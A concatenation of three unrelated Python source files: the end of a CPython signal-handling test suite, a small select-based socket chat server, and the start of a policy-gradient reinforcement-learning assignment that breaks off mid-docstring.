self.fail('HandlerBCalled exception not raised')
except HandlerBCalled:
self.assertTrue(self.b_called)
self.assertFalse(self.a_called)
child = ignoring_eintr(subprocess.Popen, ['kill', '-USR2', str(pid)])
if child:
self.wait(child) # Nothing should happen.
try:
signal.alarm(1)
# The race condition in pause doesn't matter in this case,
# since alarm is going to raise a KeyboardException, which
# will skip the call.
signal.pause()
# But if another signal arrives before the alarm, pause
# may return early.
time.sleep(1)
except KeyboardInterrupt:
pass
except:
self.fail("Some other exception woke us from pause: %s" %
traceback.format_exc())
else:
self.fail("pause returned of its own accord, and the signal"
" didn't arrive after another second.")
# Issue 3864, unknown if this affects earlier versions of freebsd also
@unittest.skipIf(sys.platform=='freebsd6',
'inter process signals not reliable (do not mix well with threading) '
'on freebsd6')
def test_main(self):
# This function spawns a child process to insulate the main
# test-running process from all the signals. It then
# communicates with that child process over a pipe and
# re-raises information about any exceptions the child
# raises. The real work happens in self.run_test().
os_done_r, os_done_w = os.pipe()
with closing(os.fdopen(os_done_r, 'rb')) as done_r, \
closing(os.fdopen(os_done_w, 'wb')) as done_w:
child = os.fork()
if child == 0:
# In the child process; run the test and report results
# through the pipe.
try:
done_r.close()
# Have to close done_w again here because
# exit_subprocess() will skip the enclosing with block.
with closing(done_w):
try:
self.run_test()
except:
pickle.dump(traceback.format_exc(), done_w)
else:
pickle.dump(None, done_w)
except:
print('Uh oh, raised from pickle.')
traceback.print_exc()
finally:
exit_subprocess()
done_w.close()
# Block for up to MAX_DURATION seconds for the test to finish.
r, w, x = select.select([done_r], [], [], self.MAX_DURATION)
if done_r in r:
tb = pickle.load(done_r)
if tb:
self.fail(tb)
else:
os.kill(child, signal.SIGKILL)
self.fail('Test deadlocked after %d seconds.' %
self.MAX_DURATION)
@unittest.skipIf(sys.platform == "win32", "Not valid on Windows")
class PosixTests(unittest.TestCase):
def trivial_signal_handler(self, *args):
pass
def test_out_of_range_signal_number_raises_error(self):
self.assertRaises(ValueError, signal.getsignal, 4242)
self.assertRaises(ValueError, signal.signal, 4242,
self.trivial_signal_handler)
def test_setting_signal_handler_to_none_raises_error(self):
self.assertRaises(TypeError, signal.signal,
signal.SIGUSR1, None)
def test_getsignal(self):
hup = signal.signal(signal.SIGHUP, self.trivial_signal_handler)
self.assertIsInstance(hup, signal.Handlers)
self.assertEqual(signal.getsignal(signal.SIGHUP),
self.trivial_signal_handler)
signal.signal(signal.SIGHUP, hup)
self.assertEqual(signal.getsignal(signal.SIGHUP), hup)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
class WindowsSignalTests(unittest.TestCase):
def test_issue9324(self):
# Updated for issue #10003, adding SIGBREAK
handler = lambda x, y: None
checked = set()
for sig in (signal.SIGABRT, signal.SIGBREAK, signal.SIGFPE,
signal.SIGILL, signal.SIGINT, signal.SIGSEGV,
signal.SIGTERM):
# Set and then reset a handler for signals that work on windows.
# Issue #18396, only for signals without a C-level handler.
if signal.getsignal(sig) is not None:
signal.signal(sig, signal.signal(sig, handler))
checked.add(sig)
# Issue #18396: Ensure the above loop at least tested *something*
self.assertTrue(checked)
with self.assertRaises(ValueError):
signal.signal(-1, handler)
with self.assertRaises(ValueError):
signal.signal(7, handler)
class WakeupFDTests(unittest.TestCase):
def test_invalid_fd(self):
fd = support.make_bad_fd()
self.assertRaises(ValueError, signal.set_wakeup_fd, fd)
@unittest.skipIf(sys.platform == "win32", "Not valid on Windows")
class WakeupSignalTests(unittest.TestCase):
def check_wakeup(self, test_body, *signals, ordered=True):
# use a subprocess to have only one thread
code = """if 1:
import fcntl
import os
import signal
import struct
signals = {!r}
def handler(signum, frame):
pass
def check_signum(signals):
data = os.read(read, len(signals)+1)
raised = struct.unpack('%uB' % len(data), data)
if not {!r}:
raised = set(raised)
signals = set(signals)
if raised != signals:
raise Exception("%r != %r" % (raised, signals))
{}
signal.signal(signal.SIGALRM, handler)
read, write = os.pipe()
for fd in (read, write):
flags = fcntl.fcntl(fd, fcntl.F_GETFL, 0)
flags = flags | os.O_NONBLOCK
fcntl.fcntl(fd, fcntl.F_SETFL, flags)
signal.set_wakeup_fd(write)
test()
check_signum(signals)
os.close(read)
os.close(write)
""".format(tuple(map(int, signals)), ordered, test_body)
assert_python_ok('-c', code)
def test_wakeup_write_error(self):
# Issue #16105: write() errors in the C signal handler should not
# pass silently.
# Use a subprocess to have only one thread.
code = """if 1:
import errno
import fcntl
import os
import signal
import sys
import time
from test.support import captured_stderr
def handler(signum, frame):
1/0
signal.signal(signal.SIGALRM, handler)
r, w = os.pipe()
flags = fcntl.fcntl(r, fcntl.F_GETFL, 0)
fcntl.fcntl(r, fcntl.F_SETFL, flags | os.O_NONBLOCK)
# Set wakeup_fd a read-only file descriptor to trigger the error
signal.set_wakeup_fd(r)
try:
with captured_stderr() as err:
signal.alarm(1)
time.sleep(5.0)
except ZeroDivisionError:
# An ignored exception should have been printed out on stderr
err = err.getvalue()
if ('Exception ignored when trying to write to the signal wakeup fd'
not in err):
raise AssertionError(err)
if ('OSError: [Errno %d]' % errno.EBADF) not in err:
raise AssertionError(err)
else:
raise AssertionError("ZeroDivisionError not raised")
"""
r, w = os.pipe()
try:
os.write(r, b'x')
except OSError:
pass
else:
self.skipTest("OS doesn't report write() error on the read end of a pipe")
finally:
os.close(r)
os.close(w)
assert_python_ok('-c', code)
def test_wakeup_fd_early(self):
self.check_wakeup("""def test():
import select
import time
TIMEOUT_FULL = 10
TIMEOUT_HALF = 5
signal.alarm(1)
before_time = time.time()
# We attempt to get a signal during the sleep,
# before select is called
time.sleep(TIMEOUT_FULL)
mid_time = time.time()
dt = mid_time - before_time
if dt >= TIMEOUT_HALF:
raise Exception("%s >= %s" % (dt, TIMEOUT_HALF))
select.select([read], [], [], TIMEOUT_FULL)
after_time = time.time()
dt = after_time - mid_time
if dt >= TIMEOUT_HALF:
raise Exception("%s >= %s" % (dt, TIMEOUT_HALF))
""", signal.SIGALRM)
def test_wakeup_fd_during(self):
self.check_wakeup("""def test():
import select
import time
TIMEOUT_FULL = 10
TIMEOUT_HALF = 5
signal.alarm(1)
before_time = time.time()
# We attempt to get a signal during the select call
try:
select.select([read], [], [], TIMEOUT_FULL)
except OSError:
pass
else:
raise Exception("OSError not raised")
after_time = time.time()
dt = after_time - before_time
if dt >= TIMEOUT_HALF:
raise Exception("%s >= %s" % (dt, TIMEOUT_HALF))
""", signal.SIGALRM)
def test_signum(self):
self.check_wakeup("""def test():
signal.signal(signal.SIGUSR1, handler)
os.kill(os.getpid(), signal.SIGUSR1)
os.kill(os.getpid(), signal.SIGALRM)
""", signal.SIGUSR1, signal.SIGALRM)
@unittest.skipUnless(hasattr(signal, 'pthread_sigmask'),
'need signal.pthread_sigmask()')
def test_pending(self):
self.check_wakeup("""def test():
signum1 = signal.SIGUSR1
signum2 = signal.SIGUSR2
signal.signal(signum1, handler)
signal.signal(signum2, handler)
signal.pthread_sigmask(signal.SIG_BLOCK, (signum1, signum2))
os.kill(os.getpid(), signum1)
os.kill(os.getpid(), signum2)
# Unblocking the 2 signals calls the C signal handler twice
signal.pthread_sigmask(signal.SIG_UNBLOCK, (signum1, signum2))
""", signal.SIGUSR1, signal.SIGUSR2, ordered=False)
@unittest.skipIf(sys.platform == "win32", "Not valid on Windows")
class SiginterruptTest(unittest.TestCase):
def readpipe_interrupted(self, interrupt):
"""Perform a read during which a signal will arrive. Return True if the
read is interrupted by the signal and raises an exception. Return False
if it returns normally.
"""
# use a subprocess to have only one thread, to have a timeout on the
# blocking read and to not touch signal handling in this process
code = """if 1:
import errno
import os
import signal
import sys
interrupt = %r
r, w = os.pipe()
def handler(signum, frame):
pass
signal.signal(signal.SIGALRM, handler)
if interrupt is not None:
signal.siginterrupt(signal.SIGALRM, interrupt)
print("ready")
sys.stdout.flush()
# run the test twice
for loop in range(2):
# send a SIGALRM in a second (during the read)
signal.alarm(1)
try:
# blocking call: read from a pipe without data
os.read(r, 1)
except OSError as err:
if err.errno != errno.EINTR:
raise
else:
sys.exit(2)
sys.exit(3)
""" % (interrupt,)
with spawn_python('-c', code) as process:
try:
# wait until the child process is loaded and has started
first_line = process.stdout.readline()
stdout, stderr = process.communicate(timeout=5.0)
except subprocess.TimeoutExpired:
process.kill()
return False
else:
stdout = first_line + stdout
exitcode = process.wait()
if exitcode not in (2, 3):
raise Exception("Child error (exit code %s): %r"
% (exitcode, stdout))
return (exitcode == 3)
def test_without_siginterrupt(self):
# If a signal handler is installed and siginterrupt is not called
# at all, when that signal arrives, it interrupts a syscall that's in
# progress.
interrupted = self.readpipe_interrupted(None)
self.assertTrue(interrupted)
def test_siginterrupt_on(self):
# If a signal handler is installed and siginterrupt is called with
# a true value for the second argument, when that signal arrives, it
# interrupts a syscall that's in progress.
interrupted = self.readpipe_interrupted(True)
self.assertTrue(interrupted)
def test_siginterrupt_off(self):
# If a signal handler is installed and siginterrupt is called with
# a false value for the second argument, when that signal arrives, it
# does not interrupt a syscall that's in progress.
interrupted = self.readpipe_interrupted(False)
self.assertFalse(interrupted)
@unittest.skipIf(sys.platform == "win32", "Not valid on Windows")
class ItimerTest(unittest.TestCase):
def setUp(self):
self.hndl_called = False
self.hndl_count = 0
self.itimer = None
self.old_alarm = signal.signal(signal.SIGALRM, self.sig_alrm)
def tearDown(self):
signal.signal(signal.SIGALRM, self.old_alarm)
if self.itimer is not None: # test_itimer_exc doesn't change this attr
# just ensure that itimer is stopped
signal.setitimer(self.itimer, 0)
def sig_alrm(self, *args):
self.hndl_called = True
def sig_vtalrm(self, *args):
self.hndl_called = True
if self.hndl_count > 3:
# it shouldn't be here, because it should have been disabled.
raise signal.ItimerError("setitimer didn't disable ITIMER_VIRTUAL "
"timer.")
elif self.hndl_count == 3:
# disable ITIMER_VIRTUAL, this function shouldn't be called anymore
signal.setitimer(signal.ITIMER_VIRTUAL, 0)
self.hndl_count += 1
def sig_prof(self, *args):
self.hndl_called = True
signal.setitimer(signal.ITIMER_PROF, 0)
def test_itimer_exc(self):
# XXX I'm assuming -1 is an invalid itimer, but maybe some platform
# defines it ?
self.assertRaises(signal.ItimerError, signal.setitimer, -1, 0)
# Negative times are treated as zero on some platforms.
if 0:
self.assertRaises(signal.ItimerError,
signal.setitimer, signal.ITIMER_REAL, -1)
def test_itimer_real(self):
self.itimer = signal.ITIMER_REAL
signal.setitimer(self.itimer, 1.0)
signal.pause()
self.assertEqual(self.hndl_called, True)
# Issue 3864, unknown if this affects earlier versions of freebsd also
@unittest.skipIf(sys.platform in ('freebsd6', 'netbsd5'),
'itimer not reliable (does not mix well with threading) on some BSDs.')
def test_itimer_virtual(self):
self.itimer = signal.ITIMER_VIRTUAL
signal.signal(signal.SIGVTALRM, self.sig_vtalrm)
signal.setitimer(self.itimer, 0.3, 0.2)
start_time = time.time()
while time.time() - start_time < 60.0:
# use up some virtual time by doing real work
_ = pow(12345, 67890, 10000019)
if signal.getitimer(self.itimer) == (0.0, 0.0):
break # sig_vtalrm handler stopped this itimer
else: # Issue 8424
self.skipTest("timeout: likely cause: machine too slow or load too "
"high")
# virtual itimer should be (0.0, 0.0) now
self.assertEqual(signal.getitimer(self.itimer), (0.0, 0.0))
# and the handler should have been called
self.assertEqual(self.hndl_called, True)
# Issue 3864, unknown if this affects earlier versions of freebsd also
@unittest.skipIf(sys.platform=='freebsd6',
'itimer not reliable (does not mix well with threading) on freebsd6')
def test_itimer_prof(self):
self.itimer = signal.ITIMER_PROF
signal.signal(signal.SIGPROF, self.sig_prof)
signal.setitimer(self.itimer, 0.2, 0.2)
start_time = time.time()
while time.time() - start_time < 60.0:
# do some work
_ = pow(12345, 67890, 10000019)
if signal.getitimer(self.itimer) == (0.0, 0.0):
break # sig_prof handler stopped this itimer
else: # Issue 8424
self.skipTest("timeout: likely cause: machine too slow or load too "
"high")
# profiling itimer should be (0.0, 0.0) now
self.assertEqual(signal.getitimer(self.itimer), (0.0, 0.0))
# and the handler should have been called
self.assertEqual(self.hndl_called, True)
class PendingSignalsTests(unittest.TestCase):
"""
Test pthread_sigmask(), pthread_kill(), sigpending() and sigwait()
functions.
"""
@unittest.skipUnless(hasattr(signal, 'sigpending'),
'need signal.sigpending()')
def test_sigpending_empty(self):
self.assertEqual(signal.sigpending(), set())
@unittest.skipUnless(hasattr(signal, 'pthread_sigmask'),
'need signal.pthread_sigmask()')
@unittest.skipUnless(hasattr(signal, 'sigpending'),
'need signal.sigpending()')
def test_sigpending(self):
code = """if 1:
import os
import signal
def handler(signum, frame):
1/0
signum = signal.SIGUSR1
signal.signal(signum, handler)
signal.pthread_sigmask(signal.SIG_BLOCK, [signum])
os.kill(os.getpid(), signum)
pending = signal.sigpending()
for sig in pending:
assert isinstance(sig, signal.Signals), repr(pending)
if pending != {signum}:
raise Exception('%s != {%s}' % (pending, signum))
try:
signal.pthread_sigmask(signal.SIG_UNBLOCK, [signum])
except ZeroDivisionError:
pass
else:
raise Exception("ZeroDivisionError not raised")
"""
assert_python_ok('-c', code)
@unittest.skipUnless(hasattr(signal, 'pthread_kill'),
'need signal.pthread_kill()')
def test_pthread_kill(self):
code = """if 1:
import signal
import threading
import sys
signum = signal.SIGUSR1
def handler(signum, frame):
1/0
signal.signal(signum, handler)
if sys.platform == 'freebsd6':
# Issue #12392 and #12469: send a signal to the main thread
# doesn't work before the creation of the first thread on
# FreeBSD 6
def noop():
pass
thread = threading.Thread(target=noop)
thread.start()
thread.join()
tid = threading.get_ident()
try:
signal.pthread_kill(tid, signum)
except ZeroDivisionError:
pass
else:
raise Exception("ZeroDivisionError not raised")
"""
assert_python_ok('-c', code)
@unittest.skipUnless(hasattr(signal, 'pthread_sigmask'),
'need signal.pthread_sigmask()')
def wait_helper(self, blocked, test):
"""
test: body of the "def test(signum):" function.
blocked: number of the blocked signal
"""
code = '''if 1:
import signal
import sys
from signal import Signals
def handler(signum, frame):
1/0
%s
blocked = %s
signum = signal.SIGALRM
# child: block and wait the signal
try:
signal.signal(signum, handler)
signal.pthread_sigmask(signal.SIG_BLOCK, [blocked])
# Do the tests
test(signum)
# The handler must not be called on unblock
try:
signal.pthread_sigmask(signal.SIG_UNBLOCK, [blocked])
except ZeroDivisionError:
print("the signal handler has been called",
file=sys.stderr)
sys.exit(1)
except BaseException as err:
print("error: {}".format(err), file=sys.stderr)
sys.stderr.flush()
sys.exit(1)
''' % (test.strip(), blocked)
# sig*wait* must be called with the signal blocked: since the current
# process might have several threads running, use a subprocess to have
# a single thread.
assert_python_ok('-c', code)
@unittest.skipUnless(hasattr(signal, 'sigwait'),
'need signal.sigwait()')
def test_sigwait(self):
self.wait_helper(signal.SIGALRM, '''
def test(signum):
signal.alarm(1)
received = signal.sigwait([signum])
assert isinstance(received, signal.Signals), received
if received != signum:
raise Exception('received %s, not %s' % (received, signum))
''')
@unittest.skipUnless(hasattr(signal, 'sigwaitinfo'),
'need signal.sigwaitinfo()')
def test_sigwaitinfo(self):
self.wait_helper(signal.SIGALRM, '''
def test(signum):
signal.alarm(1)
info = signal.sigwaitinfo([signum])
if info.si_signo != signum:
raise Exception("info.si_signo != %s" % signum)
''')
@unittest.skipUnless(hasattr(signal, 'sigtimedwait'),
'need signal.sigtimedwait()')
def test_sigtimedwait(self):
self.wait_helper(signal.SIGALRM, '''
def test(signum):
signal.alarm(1)
info = signal.sigtimedwait([signum], 10.1000)
if info.si_signo != signum:
raise Exception('info.si_signo != %s' % signum)
''')
@unittest.skipUnless(hasattr(signal, 'sigtimedwait'),
'need signal.sigtimedwait()')
def test_sigtimedwait_poll(self):
# check that polling with sigtimedwait works
self.wait_helper(signal.SIGALRM, '''
def test(signum):
import os
os.kill(os.getpid(), signum)
info = signal.sigtimedwait([signum], 0)
if info.si_signo != signum:
raise Exception('info.si_signo != %s' % signum)
''')
@unittest.skipUnless(hasattr(signal, 'sigtimedwait'),
'need signal.sigtimedwait()')
def test_sigtimedwait_timeout(self):
self.wait_helper(signal.SIGALRM, '''
def test(signum):
received = signal.sigtimedwait([signum], 1.0)
if received is not None:
raise Exception("received=%r" % (received,))
''')
@unittest.skipUnless(hasattr(signal, 'sigtimedwait'),
'need signal.sigtimedwait()')
def test_sigtimedwait_negative_timeout(self):
signum = signal.SIGALRM
self.assertRaises(ValueError, signal.sigtimedwait, [signum], -1.0)
@unittest.skipUnless(hasattr(signal, 'sigwaitinfo'),
'need signal.sigwaitinfo()')
# Issue #18238: sigwaitinfo() can be interrupted on Linux (raises
# InterruptedError), but not on AIX
@unittest.skipIf(sys.platform.startswith("aix"),
'signal.sigwaitinfo() cannot be interrupted on AIX')
def test_sigwaitinfo_interrupted(self):
self.wait_helper(signal.SIGUSR1, '''
def test(signum):
import errno
hndl_called = True
def alarm_handler(signum, frame):
hndl_called = False
signal.signal(signal.SIGALRM, alarm_handler)
signal.alarm(1)
try:
signal.sigwaitinfo([signal.SIGUSR1])
except OSError as e:
if e.errno == errno.EINTR:
if not hndl_called:
raise Exception("SIGALRM handler not called")
else:
raise Exception("Expected EINTR to be raised by sigwaitinfo")
else:
raise Exception("Expected EINTR to be raised by sigwaitinfo")
''')
@unittest.skipUnless(hasattr(signal, 'sigwait'),
'need signal.sigwait()')
@unittest.skipUnless(hasattr(signal, 'pthread_sigmask'),
'need signal.pthread_sigmask()')
@unittest.skipIf(threading is None, "test needs threading module")
def test_sigwait_thread(self):
# Check that calling sigwait() from a thread doesn't suspend the whole
# process. A new interpreter is spawned to avoid problems when mixing
# threads and fork(): only async-safe functions are allowed between
# fork() and exec().
assert_python_ok("-c", """if True:
import os, threading, sys, time, signal
# the default handler terminates the process
signum = signal.SIGUSR1
def kill_later():
# wait until the main thread is waiting in sigwait()
time.sleep(1)
os.kill(os.getpid(), signum)
# the signal must be blocked by all the threads
signal.pthread_sigmask(signal.SIG_BLOCK, [signum])
killer = threading.Thread(target=kill_later)
killer.start()
received = signal.sigwait([signum])
if received != signum:
print("sigwait() received %s, not %s" % (received, signum),
file=sys.stderr)
sys.exit(1)
killer.join()
# unblock the signal, which should have been cleared by sigwait()
signal.pthread_sigmask(signal.SIG_UNBLOCK, [signum])
""")
@unittest.skipUnless(hasattr(signal, 'pthread_sigmask'),
'need signal.pthread_sigmask()')
def test_pthread_sigmask_arguments(self):
self.assertRaises(TypeError, signal.pthread_sigmask)
self.assertRaises(TypeError, signal.pthread_sigmask, 1)
self.assertRaises(TypeError, signal.pthread_sigmask, 1, 2, 3)
self.assertRaises(OSError, signal.pthread_sigmask, 1700, [])
@unittest.skipUnless(hasattr(signal, 'pthread_sigmask'),
'need signal.pthread_sigmask()')
def test_pthread_sigmask(self):
code = """if 1:
import signal
import os; import threading
def handler(signum, frame):
1/0
def kill(signum):
os.kill(os.getpid(), signum)
def check_mask(mask):
for sig in mask:
assert isinstance(sig, signal.Signals), repr(sig)
def read_sigmask():
sigmask = signal.pthread_sigmask(signal.SIG_BLOCK, [])
check_mask(sigmask)
return sigmask
signum = signal.SIGUSR1
# Install our signal handler
old_handler = signal.signal(signum, handler)
# Unblock SIGUSR1 (and copy the old mask) to test our signal handler
old_mask = signal.pthread_sigmask(signal.SIG_UNBLOCK, [signum])
check_mask(old_mask)
try:
kill(signum)
except ZeroDivisionError:
pass
else:
raise Exception("ZeroDivisionError not raised")
# Block and then raise SIGUSR1. The signal is blocked: the signal
# handler is not called, and the signal is now pending
mask = signal.pthread_sigmask(signal.SIG_BLOCK, [signum])
check_mask(mask)
kill(signum)
# Check the new mask
blocked = read_sigmask()
check_mask(blocked)
if signum not in blocked:
raise Exception("%s not in %s" % (signum, blocked))
if old_mask ^ blocked != {signum}:
raise Exception("%s ^ %s != {%s}" % (old_mask, blocked, signum))
# Unblock SIGUSR1
try:
# unblock the pending signal calls immediately the signal handler
signal.pthread_sigmask(signal.SIG_UNBLOCK, [signum])
except ZeroDivisionError:
pass
else:
raise Exception("ZeroDivisionError not raised")
try:
kill(signum)
except ZeroDivisionError:
pass
else:
raise Exception("ZeroDivisionError not raised")
# Check the new mask
unblocked = read_sigmask()
if signum in unblocked:
raise Exception("%s in %s" % (signum, unblocked))
if blocked ^ unblocked != {signum}:
raise Exception("%s ^ %s != {%s}" % (blocked, unblocked, signum))
if old_mask != unblocked:
raise Exception("%s != %s" % (old_mask, unblocked))
"""
assert_python_ok('-c', code)
@unittest.skipIf(sys.platform == 'freebsd6',
"issue #12392: send a signal to the main thread doesn't work "
"before the creation of the first thread on FreeBSD 6")
@unittest.skipUnless(hasattr(signal, 'pthread_kill'),
'need signal.pthread_kill()')
def test_pthread_kill_main_thread(self):
# Test that a signal can be sent to the main thread with pthread_kill()
# before any other thread has been created (see issue #12392).
code = """if True:
import threading
import signal
import sys
def handler(signum, frame):
sys.exit(3)
signal.signal(signal.SIGUSR1, handler)
signal.pthread_kill(threading.get_ident(), signal.SIGUSR1)
sys.exit(2)
"""
with spawn_python('-c', code) as process:
stdout, stderr = process.communicate()
exitcode = process.wait()
if exitcode != 3:
raise Exception("Child error (exit code %s): %s" %
(exitcode, stdout))
def test_main():
try:
support.run_unittest(GenericTests, PosixTests, InterProcessSignalTests,
WakeupFDTests, WakeupSignalTests,
SiginterruptTest, ItimerTest, WindowsSignalTests,
PendingSignalsTests)
finally:
support.reap_children()
if __name__ == "__main__":
test_main()
|
server.py
|
import logging
import queue
import socket
import threading
import select
import config
logging.basicConfig(
format='%(asctime)s.%(msecs)03d %(levelname)s:\t%(message)s',
level=logging.INFO,
datefmt='%H:%M:%S')
class Server:
def __init__(self):
self._socket = None
self._server_running_flag = threading.Event()
self._server_thread = None
    def _server_loop(self):
inputs = [self._socket]
outputs = []
data_buffers = {}
        while self._server_running_flag.is_set():
            # a timeout lets the loop re-check the running flag so stop_server() can take effect
            readable, writable, exceptional = select.select(inputs, outputs, inputs, 0.5)
for sock in readable:
if sock is self._socket:
client_socket, client_address = sock.accept()
# if the server socket turns up in the inputs list, it means a new socket has connected to the
# server socket.
# ssl_sock = context.wrap_socket(client_socket, server_side=True)
client_socket.setblocking(False)
inputs.append(client_socket)
data_buffers[client_socket] = queue.Queue()
logging.info(f"Connection successful from {client_address}")
else:
try:
data = sock.recv(config.PACKET_SIZE)
except ConnectionResetError as e:
data = None
                    if data:  # data received: queue it for broadcast to the connected clients.
                        for out_sock in inputs:
                            if out_sock is self._socket:
                                continue  # never queue data on the listening socket
                            # to exclude the sender from the broadcast, also skip when out_sock is sock
                            data_buffers[out_sock].put(data)
                            if out_sock not in outputs:
                                outputs.append(out_sock)
else: # if empty, remove/disconnect client socket
exceptional.append(sock)
for sock in writable:
try:
data = data_buffers[sock].get_nowait()
except queue.Empty:
outputs.remove(sock)
else:
try:
sock.send(data)
except ConnectionResetError:
exceptional.append(sock)
            for sock in set(exceptional):  # disconnect any socket that errored or hung up.
                try:
                    logging.info(f"Disconnect from {sock.getpeername()}")
                except OSError:
                    logging.info("Disconnect from client (peer address unavailable)")
                if sock in inputs:
                    inputs.remove(sock)
                if sock in outputs:
                    outputs.remove(sock)
                sock.close()
                data_buffers.pop(sock, None)
self._socket.close()
self._server_running_flag.clear()
def start_server(self, ip: str, port: int) -> bool:
"""
:param ip: IP/Hostname of the server.
:param port: Port of the server.
:return: Boolean if the server has successfully started.
"""
if self._server_running_flag.is_set():
return True
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.setblocking(False)
self._server_running_flag.clear()
try:
self._socket.bind((ip, int(port)))
self._socket.listen(config.MAX_JOINABLE_CLIENTS)
self._server_thread = threading.Thread(target=Server._server_loop, args=(self,), daemon=True)
self._server_running_flag.set()
self._server_thread.start()
logging.info(f"Server started from IP: {ip}, port: {port}")
        except OSError as e:  # bind/listen failures (e.g. address already in use) are OSErrors
logging.error(e)
self._server_running_flag.clear()
return self._server_running_flag.is_set()
def stop_server(self):
self._server_running_flag.clear()
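# Illustrative usage sketch (an addition, not part of the original module). It assumes the
# `config` module imported above provides PACKET_SIZE and MAX_JOINABLE_CLIENTS and that
# port 50007 is free on localhost; clients can then connect with e.g. `nc 127.0.0.1 50007`.
if __name__ == "__main__":
    import time
    server = Server()
    if server.start_server("127.0.0.1", 50007):
        try:
            time.sleep(30)  # keep serving for a while; messages are relayed between clients
        finally:
            server.stop_server()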
|
train_pg_f18.py
|
"""
Original code from John Schulman for CS294 Deep Reinforcement Learning Spring 2017
Adapted for CS294-112 Fall 2017 by Abhishek Gupta and Joshua Achiam
Adapted for CS294-112 Fall 2018 by Michael Chang and Soroush Nasiriany
"""
import numpy as np
import tensorflow as tf
import gym
import logz
import os
import time
import inspect
from multiprocessing import Process
# raise on floating point errors (divide by zero, overflow, invalid, underflow)
np.seterr(all='raise')
#============================================================================================#
# Utilities
#============================================================================================#
def normalize(data, mean=0.0, std=1.0):
z = (data-np.mean(data)) / (np.std(data) + 1e-8)
return z * std + mean
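def _demo_normalize():
    # Sketch (an addition, not part of the original assignment code): normalize() rescales
    # data to a requested mean/std; with the defaults the result has mean ~0 and std ~1.
    x = np.array([1.0, 2.0, 3.0])
    z = normalize(x)  # approx [-1.2247, 0.0, 1.2247]
    assert abs(float(np.mean(z))) < 1e-6 and abs(float(np.std(z)) - 1.0) < 1e-4
    shifted = normalize(x, mean=5.0, std=2.0)
    assert abs(float(np.mean(shifted)) - 5.0) < 1e-6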
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def build_mlp(input_placeholder, output_size, scope, n_layers, size, activation=tf.tanh, output_activation=None):
"""
Builds a feedforward neural network
arguments:
input_placeholder: placeholder variable for the state (batch_size, input_size)
output_size: size of the output layer
scope: variable scope of the network
n_layers: number of hidden layers
size: dimension of the hidden layer
activation: activation of the hidden layers
            output_activation: activation of the output layer
returns:
output placeholder of the network (the result of a forward pass)
Hint: use tf.layers.dense
"""
with tf.variable_scope(scope):
initializer = None
if activation == tf.tanh or activation == tf.sigmoid:
initializer = tf.contrib.layers.xavier_initializer()
elif activation == tf.nn.relu or activation == tf.nn.leaky_relu:
initializer = tf.initializers.he_normal()
output_placeholder = tf.layers.dense(input_placeholder, size, activation=activation, kernel_initializer=initializer)
for i in range(n_layers - 1):
output_placeholder = tf.layers.dense(output_placeholder, size, activation=activation, kernel_initializer=initializer)
output_initializer = None
if output_activation == tf.tanh or output_activation == tf.sigmoid:
output_initializer = tf.contrib.layers.xavier_initializer()
elif output_activation == tf.nn.relu or output_activation == tf.nn.leaky_relu:
output_initializer = tf.initializers.he_normal()
output_placeholder = tf.layers.dense(output_placeholder, output_size, activation=output_activation, kernel_initializer=output_initializer)
return output_placeholder
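def _demo_build_mlp():
    # Sketch (an addition, not part of the original assignment code): build a 2-hidden-layer
    # MLP mapping a 4-dimensional observation to 2 logits, as a discrete policy head would.
    # Assumes TF 1.x graph mode, matching the rest of this file; call at most once per scope.
    obs_ph = tf.placeholder(shape=[None, 4], dtype=tf.float32, name="demo_ob")
    logits = build_mlp(obs_ph, output_size=2, scope="demo_policy", n_layers=2, size=64)
    return obs_ph, logits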
def pathlength(path):
return len(path["reward"])
def setup_logger(logdir, locals_):
# Configure output directory for logging
logz.configure_output_dir(logdir)
# Log experimental parameters
args = inspect.getargspec(train_PG)[0]
params = {k: locals_[k] if k in locals_ else None for k in args}
logz.save_params(params)
#============================================================================================#
# Policy Gradient
#============================================================================================#
class Agent(object):
def __init__(self, computation_graph_args, sample_trajectory_args, estimate_return_args):
super(Agent, self).__init__()
self.ob_dim = computation_graph_args['ob_dim']
self.ac_dim = computation_graph_args['ac_dim']
self.discrete = computation_graph_args['discrete']
self.size = computation_graph_args['size']
self.n_layers = computation_graph_args['n_layers']
self.learning_rate = computation_graph_args['learning_rate']
self.animate = sample_trajectory_args['animate']
self.max_path_length = sample_trajectory_args['max_path_length']
self.min_timesteps_per_batch = sample_trajectory_args['min_timesteps_per_batch']
self.gamma = estimate_return_args['gamma']
self.reward_to_go = estimate_return_args['reward_to_go']
self.nn_baseline = estimate_return_args['nn_baseline']
self.normalize_advantages = estimate_return_args['normalize_advantages']
def init_tf_sess(self):
tf_config = tf.ConfigProto(inter_op_parallelism_threads=1, intra_op_parallelism_threads=1)
# testing gpu allocation
tf_config.gpu_options.allow_growth = True
# end test
self.sess = tf.Session(config=tf_config)
self.sess.__enter__() # equivalent to `with self.sess:`
tf.global_variables_initializer().run() #pylint: disable=E1101
# for debugging
import datetime
writer = tf.summary.FileWriter('./tensorboard_logs/' + str(datetime.datetime.now().strftime("%Y_%m_%d_%H_%M_%S")), self.sess.graph)
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def define_placeholders(self):
"""
            Placeholders for batched observations / actions / advantages in the policy gradient
loss function.
See Agent.build_computation_graph for notation
returns:
sy_ob_no: placeholder for observations
sy_ac_na: placeholder for actions
sy_adv_n: placeholder for advantages
"""
sy_ob_no = tf.placeholder(shape=[None, self.ob_dim], name="ob", dtype=tf.float32)
if self.discrete:
sy_ac_na = tf.placeholder(shape=[None], name="ac", dtype=tf.int32)
else:
sy_ac_na = tf.placeholder(shape=[None, self.ac_dim], name="ac", dtype=tf.float32)
sy_adv_n = tf.placeholder(shape=[None], name="adv", dtype=tf.float32)
return sy_ob_no, sy_ac_na, sy_adv_n
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def policy_forward_pass(self, sy_ob_no):
""" Constructs the symbolic operation for the policy network outputs,
which are the parameters of the policy distribution p(a|s)
arguments:
sy_ob_no: (batch_size, self.ob_dim)
returns:
the parameters of the policy.
if discrete, the parameters are the logits of a categorical distribution
over the actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous, the parameters are a tuple (mean, log_std) of a Gaussian
distribution over actions. log_std should just be a trainable
variable, not a network output.
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
Hint: use the 'build_mlp' function to output the logits (in the discrete case)
and the mean (in the continuous case).
